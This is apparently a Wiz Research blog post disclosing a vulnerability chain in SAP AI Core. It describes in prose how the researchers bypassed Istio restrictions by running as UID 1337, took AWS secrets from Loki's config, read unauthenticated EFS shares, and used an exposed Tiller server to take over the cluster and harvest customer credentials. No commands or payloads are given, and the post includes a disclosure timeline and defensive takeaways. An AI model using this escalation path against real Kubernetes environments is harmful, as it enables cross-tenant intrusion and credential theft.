Does AI have an isolation problem?

Over the past months, we on the Wiz Research Team have conducted extensive tenant isolation research on multiple AI service providers. We believe these services are more susceptible to tenant isolation vulnerabilities, since by definition, they allow users to run AI models and applications – which is equivalent to executing arbitrary code. As AI infrastructure is fast becoming a staple of many business environments, the implications of these attacks are becoming more and more significant.

We will be presenting our findings from this research project at the upcoming Black Hat conference, in our session “Isolation or Hallucination? Hacking AI Infrastructure Providers for Fun and Weights”.

For the latest installment of this project, we researched SAP’s AI offering, aptly named “SAP AI Core.” This is our 3rd report in the series, following our research on the Hugging Face and Replicate platforms. This blog will explore the vulnerability chain and detail our findings, dubbed “SAPwned,” while also looking at the potential impact and broader takeaways for securing managed AI platforms.

Executive Summary

The AI training process requires access to vast amounts of sensitive customer data, which turns AI training services into attractive targets for attackers. SAP AI Core offers integrations with HANA and other cloud services, to access customers’ internal data via cloud access keys. These credentials are highly sensitive, and our research goal was to determine if potential malicious actors could gain access to these customer secrets.

Our research into SAP AI Core began through executing legitimate AI training procedures using SAP’s infrastructure. By executing arbitrary code, we were able move laterally and take over the service – gaining access to customers’ private files, along with credentials to customers’ cloud environments: AWS, Azure, SAP HANA Cloud, and more. The vulnerabilities we found could have allowed attackers to access customers’ data and contaminate internal artifacts – spreading to related services and other customers’ environments.

Specifically, the access we gained allowed us to:

Read and modify Docker images on SAP’s internal container registry
Read and modify SAP’s Docker images on Google Container Registry
Read and modify artifacts on SAP’s internal Artifactory server
Gain cluster administrator privileges on SAP AI Core’s Kubernetes cluster
Access customers’ cloud credentials and private AI artifacts

Step-by-step illustration of our research findings

The root cause of these issues was the ability for attackers to run malicious AI models and training procedures, which are essentially code. After reviewing several leading AI services, we believe the industry must improve its isolation and sandboxing standards when running AI models.

All vulnerabilities have been reported to SAP’s security team and fixed by SAP, as acknowledged on their website. We thank them for their cooperation. No customer data was compromised.

Following is a technical dive into our vulnerability chain and findings.

Crying Out Cloud

SAPwned: SAP AI Core vulnerabilities - Special Guest: Hillai Ben-Sasson

The Wiz Research Team uncovered serious vulnerabilities in SAP AI Core, revealing potential risks in #AI infrastructure.

Listen now

Introduction: The research begins

SAP AI Core is a service that allows users to develop, train and run AI services in a scalable and managed way, utilizing SAP’s vast cloud resources. Similar to other cloud providers (and AI infrastructure providers), the customer’s code runs within SAP’s shared environment – posing a risk of cross-tenant access.

Our research began as an SAP customer, with basic permissions allowing us to create AI projects. So, we started out by creating a regular AI application on SAP AI Core. SAP’s platform allowed us to provide an Argo Workflow file, which in turn spawned a new Kubernetes Pod according to our configuration.

Example Argo Workflow configuration on SAP AI Core

This allowed us to run our own arbitrary code within the Pod by design – no vulnerability needed. However, our environment was quite restricted. We quickly realized our Pod had extremely limited network access, as enforced by an Istio proxy sidecar – so scanning the internal network wasn’t an option for us. Yet.

Bug #1: Bypassing network restrictions with the power of 1337

The first thing we tried was to configure our Pod with “interesting” privileges. However, SAP’s admission controller blocked all the dangerous security options we tried – for example, running our container as root.

Despite that, we found two interesting configurations that the admission controller failed to block.

The first is shareProcessNamespace, which allowed us to share the process namespace with our sidecar container. Since our sidecar was the Istio proxy, we gained access to Istio’s configuration, including an access token to the cluster’s centralized Istiod server.

Accessing the Istio token via our sidecar container

The other is runAsUser (and runAsGroup). Although we couldn’t be root, all other UIDs were allowed – including Istio’s UID, which ironically enough was 1337 (yeah, really). We set our UID to 1337 and successfully ran as the Istio user. Since Istio itself is excluded from Istio’s iptables rules – we were now running without any traffic restrictions!

Sending requests to the internal network – before and after UID 1337

Free from our traffic shackles, we started scanning our Pod’s internal network. Using our Istio token, we were able to read configurations from the Istiod server and gain insight on the internal environment – which led us to the following findings.

Bug #2: Loki leaks AWS tokens

We found an instance of Grafana Loki on the cluster, so we requested the /config endpoint to view Loki’s configuration. The API responded with the full configuration, including AWS secrets that Loki used to access S3:

Configuration excerpt from SAP’s Loki server

These secrets granted access to Loki’s S3 bucket, containing a large trove of logs from AI Core services (which SAP says aren’t sensitive) and customer Pods.

Partial file list from Loki’s S3 bucket

Bug #3: Unauthenticated EFS shares expose user files

Within the internal network, we found 6 instances of AWS Elastic File System (EFS), listening on port 2049. A common problem with EFS instances is their default configuration as public – meaning credentials aren’t needed to view or edit files, as long as you have network access to their NFS ports. These instances were no different, and using simple open-source NFS tools, we were able to freely access the shares’ contents.

Listing files stored on these EFS instances has revealed mass amounts of AI data, including code and training datasets, categorized by customer ID:

Partial file list from two EFS shares; each folder represents a different customer ID

Bug #4: Unauthenticated Helm server compromises internal Docker Registry and Artifactory

Our most interesting finding on the network was a service named Tiller, which is the server component of the Helm package manager (in version 2).

Communication with Tiller is made via its gRPC interface on port 44134, which is by default exposed without any authentication.

Querying this server on our internal network revealed highly privileged secrets to SAP’s Docker Registry as well as its Artifactory server:

Container registry and Artifactory credentials – exposed by Helm server query

Using these secrets’ read access, a potential attacker could read internal images and builds, extracting commercial secrets and possibly customer data.

Using the secrets’ write access, an attacker could poison images and builds, conducting a supply-chain attack on SAP AI Core services.

wiz academy

What is AI-SPM? [AI Security Posture Management]

Bug #5: Unauthenticated Helm server compromises K8s cluster, exposing Google access tokens and customer secrets

The Helm server was exposed to both read and write operations. While the read access exposed sensitive secrets (as can be seen above), the server’s write access allowed for a complete cluster takeover.

Tiller’s install command takes a Helm package and deploys it to the K8s cluster. We created a malicious Helm package that spawns a new Pod with cluster-admin privileges, and ran the install command.

We were now running with full privileges on the cluster!

Partial list of K8s permissions we obtained via Helm

Using this access level, an attacker could directly access other customer’s Pods and steal sensitive data, such as models, datasets, and code. This access also allows attackers to interfere with customer’s Pods, taint AI data and manipulate models’ inference.

Furthermore, this access level would have allowed us to view customers’ own secrets – even secrets that are beyond the scope of SAP AI Core. For example, our AI Core account contained secrets to our AWS account (for S3 data access), our SAP HANA account (for Data Lake access), and our Docker Hub account (to pull our images). Using our newfound access level, we queried for those secrets, and managed to access all of them in plaintext:

Accessing customer secrets using our K8s permissions

The same query also revealed an SAP access key to Google Container Registry, named sap-docker-registry-secret. We have confirmed that this key grants both read and write permissions – further enlarging the scope of a potential supply-chain attack.

Takeaways

Our research into SAP AI Core demonstrates the importance of defense in depth. The main security obstacle we were facing was Istio blocking our traffic from reaching the internal network. Once we were able to bypass that obstacle, we gained access to several internal assets that did not require any additional authentication – meaning the internal network was perceived as trusted. Hardening those internal services could have minimized the impact of this attack and downgraded it from a complete service takeover to a minor security incident.

In line with our previous Kubernetes-related vulnerabilities, this research also demonstrates the tenant isolation pitfalls of using K8s in managed services. The crucial separation between the control plane (service logic) and the data plane (customer compute) is being impacted by the K8s architecture, which allows logical connections between them through APIs, identities, shared compute, and software-segmented networks.

Furthermore, this research demonstrates the unique challenges that the AI R&D process introduces. AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to assure that untrusted code is properly separated from internal assets and other tenants.

Wiz AI Security Posture Management (AI-SPM)

Accelerate AI adoption securely with continuous visibility and proactive risk mitigation across your AI models, training data, and AI services.

Learn More

Disclosure timeline

Jan. 25, 2024 – Wiz Research reports security findings to SAP
Jan. 27, 2024 – SAP replies and assigns a case number
Feb. 16, 2024 – SAP fixes first vulnerability and rotates relevant secrets
Feb. 28, 2024 – Wiz Research bypasses the patch using 2 new vulnerabilities, reports to SAP
May 15, 2024 – SAP deploys fixes for all reported vulnerabilities
Jul. 17, 2024 – Public disclosure

Stay in touch!

Hi there! We are Hillai Ben-Sasson (@hillai), Shir Tamari (@shirtamari), Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_) and Ronen Shustin (@ronenshh) from the Wiz Research Team. We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors.

We would love to hear from you! Feel free to contact us on Twitter or via email: research@wiz.io. 

SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts